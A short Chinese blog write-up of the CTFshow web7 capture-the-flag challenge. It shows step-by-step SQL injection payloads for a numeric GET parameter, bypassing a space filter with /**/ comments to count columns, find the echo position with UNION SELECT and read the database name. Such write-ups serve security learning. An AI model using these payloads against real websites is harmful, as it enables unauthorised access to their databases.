CTFshow-Web-SQL注入空格过滤绕过GET类型

一、靶场:ctfshow web7
二、解题步骤:
步骤一:观察页面发现有几个链接,点开后发现url上面疑似存在注入点

image1

image2

步骤二:测试注入点;由前面的结论可知,该注入点为数字型,使用万能语句进行测试:?id=1 and 1=1#

image3

发现疑似存在web6靶场的过滤机制,即将空格进行过滤,这里尝试将空格替换为/**/,即:?id=1/**/and/**/1=1#

image4

发现可以正常显示了

步骤三:判断列数

列数<=3时正常显示:?id=1/**/order/**/by/**/3;#

image5

列数>3时不正常显示:?id=1/**/order/**/by/**/4;#

image6

步骤四:判断回显位:?id=1/**/union/**/select/**/1,2,3;#

image7

步骤五:爆表名:?id=1/**/union/**/select/**/1,database(),3;#

image8

到这里就可以发现其实和web6靶场后面的注入是一样的,他们的区别主要就在于本靶场为url的get类型注入,web6为post注入,后续操作与web6一致,这里不做赘述。

posted @ 2025-12-03 09:33  shinianyunyan  阅读(9)  评论(0)    收藏  举报